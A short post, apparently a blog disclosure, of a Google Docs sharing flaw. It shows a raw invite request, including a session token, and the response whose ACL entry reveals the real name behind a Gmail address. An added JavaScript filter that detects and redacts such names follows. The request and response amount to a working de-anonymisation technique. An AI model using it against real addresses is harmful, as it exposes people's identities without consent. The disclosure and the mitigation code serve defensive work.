Google Security hole: Determine people’s names from their Gmail Account
Posting to this URL:
https://docs.google.com/e/commonshare
app 2
authuser 0
clientUser 10495966446245
confirmed false
foreignService kix
hl en
itemIds 1kKdL8JV8jJP5sDBprLzAgxDGvDTTA_s8KY
notificationInfo {"messageType":"invite","recipient":"someemail@gmail.com","optionValues":{"ccMe":false,"pasteInEmail":false}}
requestType invite
role 30
sendEmail true
shareProtocolVersion 2
shareService kix
subapp 10
token US5VKC0BAAA.J0BSgZ7BpREraHwLcA
&&&START&&&{"status":0,"modelChanges":[{"aclEntries":[{"scope":{"name":"Their name appears here","id":"114892889789266972","scopeType":"user","me":false,"email":"somemail@gmail.com"},"role":30}],"id":"1kKdL8JV8jJP5Tr3prLzAgxDGvDTTA_s8KY","visibilitySetting":{"role":0,"summary":"Private to me + 3 more","visibilityState":"private","restrictedToDomain":true,"visibilityEntries":[{"role":0,"summary":"Private","visibilityState":"private","restrictedToDomain":true,"details":"Only people explicitly granted permission can access. Sign-in required."}]}}]}
Interesting? 🙂
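The disclosure above comes from the "name" field of each aclEntries scope in the share response. The following is an added example, not code from this post or from Google: a sketch of a server-side filter and a regression check that keep that field from revealing more than the address the requester typed. The function names, the knownEmails input and the sample values are assumptions made for illustration.

```javascript
// Added example: hypothetical server-side filter, not Google's code.
const PREFIX = "&&&START&&&"; // response prefix shown on the page

// Constructed sample shaped like the page's response; all values are made up.
const SAMPLE = PREFIX + JSON.stringify({
  status: 0,
  modelChanges: [{
    id: "DOC_ID_PLACEHOLDER",
    aclEntries: [
      { role: 30, scope: { name: "Alice Example", scopeType: "user", me: false,
                           email: "stranger@example.com" } },
      { role: 30, scope: { name: "Bob Example", scopeType: "user", me: false,
                           email: "colleague@example.com" } },
    ],
  }],
});

function parseShareResponse(raw) {
  if (!raw.startsWith(PREFIX)) throw new Error("unexpected response prefix");
  return JSON.parse(raw.slice(PREFIX.length));
}

// Visit every user ACL entry whose e-mail is not in knownEmails (assumed input:
// addresses the requester already has a relationship with, e.g. contacts).
function forEachUnknownUser(response, knownEmails, visit) {
  const known = new Set(knownEmails.map((e) => e.toLowerCase()));
  for (const change of response.modelChanges || []) {
    for (const { scope } of change.aclEntries || []) {
      if (!scope || scope.scopeType !== "user" || scope.me) continue;
      if (!known.has(String(scope.email).toLowerCase())) visit(scope);
    }
  }
}

// Regression check: e-mails whose entry carries a name beyond the address itself.
function leakedNames(response, knownEmails) {
  const leaks = [];
  forEachUnknownUser(response, knownEmails, (s) => {
    if (s.name && s.name !== s.email) leaks.push(s.email);
  });
  return leaks;
}

// Mitigation: return a copy in which unknown recipients are labelled by the
// address the requester typed, so the response discloses nothing new.
function redactUnknownNames(response, knownEmails) {
  const copy = JSON.parse(JSON.stringify(response));
  forEachUnknownUser(copy, knownEmails, (s) => { s.name = s.email; });
  return copy;
}
```

Running leakedNames over captured responses in a test suite flags any share reply that returns a display name for an address the requester has no prior relationship with.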